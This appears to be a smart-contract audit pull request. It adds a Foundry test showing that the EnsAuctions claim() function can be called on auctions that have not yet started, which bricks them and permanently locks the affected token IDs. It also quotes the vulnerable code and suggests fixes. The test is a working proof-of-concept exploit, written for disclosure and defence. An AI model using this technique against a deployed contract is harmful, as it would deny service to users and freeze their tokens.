### PR TITLE
Bug: Claiming future auctions allowed

### DIFF
--- a/test/EnsAuctions.t.sol
+++ b/test/EnsAuctions.t.sol
@@ -83,6 +83,46 @@ contract EnsAuctionsTest is Test {
     }
 
     //
+    // Exploit 
+    //
+
+    /// @dev Because Active is the default status it's possible for malicious users to brick future auctions with the claim function
+    function testClaimFutureAuction() public {
+        assertEq(auctions.nextAuctionId(), 1);
+
+        auctions.claim(1);
+        auctions.claim(2);
+
+        (EnsAuctions.Status status,,,,,,,,) = auctions.auctions(1);
+        assert(status == EnsAuctions.Status.Claimed);
+        (status,,,,,,,,) = auctions.auctions(2);
+        assert(status == EnsAuctions.Status.Claimed);
+
+        vm.startPrank(user1);
+        auctions.startAuction{value: auctions.calculateFee(user1, false)}(0.01 ether, buyNowPrice, tokenIds, unwrapped, false);
+        vm.warp(auctions.getNextEventStartTime() + 1);
+
+        vm.stopPrank();
+        vm.startPrank(user2);
+
+        /// Auction bricked and prevented from ending via an expected path
+        vm.expectRevert(bytes4(keccak256("InvalidStatus()")));
+        auctions.bid{value: 0.01 ether}(1, 0.01 ether);
+
+        vm.stopPrank();
+        vm.startPrank(user1);
+
+        uint256 fee = auctions.calculateFee(user1, false);
+
+        /// This breaks internal accounting logic given that _resetTokens() is prevented from being called again for the relevant tokenIds
+        /// This permanently prevents the tokenIds from being auctioned in the future
+        assertEq(auctions.tokenOnAuction(tokenIds[0]), true);
+        vm.expectRevert(bytes4(keccak256("TokenAlreadyInAuction()")));
+        auctions.startAuction{value: fee}(0.01 ether, buyNowPrice, tokenIds, unwrapped, false);
+        vm.stopPrank();
+    }
+
+    //
     // startAuction()
     //
     function test_startAuction_Success() public {


### PR DESCRIPTION
## Bug

It's possible to call the claim function on future auctions before they have been started.

Because of the default values of the `Auction` struct, namely the status (Active), endTime (0), and tokenCount(0), it's possible for a malicious user to brick future auctions with the claim function.

This bug means that it's possible to permanently prevent certain tokenIds from being auctioned in the future if they have been used to set up an auction that has already been claimed.

```
File: src/EnsAuctions.sol
257:     function claim(uint256 auctionId) external {
258:         Auction storage auction = auctions[auctionId];
259: 
260:         if (auction.status != Status.Active) revert InvalidStatus();
261:         if (block.timestamp < auction.endTime) revert AuctionNotEnded();
262: 
263:         auction.status = Status.Claimed;
264: 
265:         balances[auction.seller] += auction.highestBid;
266:         ++sellers[auction.seller].totalSold;
267: 
268:         emit Claimed(auctionId, auction.highestBidder);
269: 
270:         _transferTokens(auction);
271:     }
```

## Proof of Concept

Consult the added test in this pull request that demonstrates the bug.

## Mitigation

Consider checking whether there are any outstanding bids in in the `claim()` function, and reverting if not.

Alternatively, consider adding an additional status `PreAuction`, and setting the relevant auction status to `Active` in `startAuction()` function.